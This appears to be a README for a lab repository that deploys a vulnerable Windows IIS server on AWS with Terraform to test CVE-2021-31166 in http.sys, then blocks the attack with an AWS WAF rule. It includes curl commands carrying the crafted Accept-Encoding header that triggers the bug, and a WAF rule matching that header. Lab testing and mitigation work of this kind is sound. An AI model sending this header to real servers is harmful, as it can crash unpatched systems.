This Repo is inspired on 0vercl0k for a proof of concept for CVE-2021-31166 ("HTTP Protocol Stack Remote Code Execution Vulnerability"), a use-after-free dereference in http.sys
patched by Microsoft in May 2021.
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve
The terraform will create an EC2 Instance with Windows Server Core 20H2, install IIS
and add SSM
permissions to open a Web Powershell Session from AWS Console
. It will also create a Application Load Balancer
and use the instance as target. By default the Security Group
will add only YOUR IP as allow to access on HTTP.
#Define Values from Terraform Output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')
#Testing to ALB
while true; do curl -I $ALB --connect-timeout 1 ; done
#Testing Directly to EC2'
while true; do curl -I $EC2IP --connect-timeout 1 ; done
#Testing to ALB
curl -i $ALB -H "Accept-Encoding: doar-e, ftw, imo, ,"
#Testing Directly to EC2'
curl -i $EC2IP -H "Accept-Encoding: doar-e, ftw, imo, ,"
{
"Name": "cve-block",
"Priority": 0,
"Statement": {
"ByteMatchStatement": {
"SearchString": "doar-e, ftw, imo, ,",
"FieldToMatch": {
"SingleHeader": {
"Name": "accept-encoding"
}
},
"TextTransformations": [
{
"Priority": 0,
"Type": "NONE"
}
],
"PositionalConstraint": "EXACTLY"
}
},
"Action": {
"Block": {
"CustomResponse": {
"ResponseCode": 418,
"CustomResponseBodyKey": "418"
}
}
},
"VisibilityConfig": {
"SampledRequestsEnabled": true,
"CloudWatchMetricsEnabled": true,
"MetricName": "cve-block"
}
}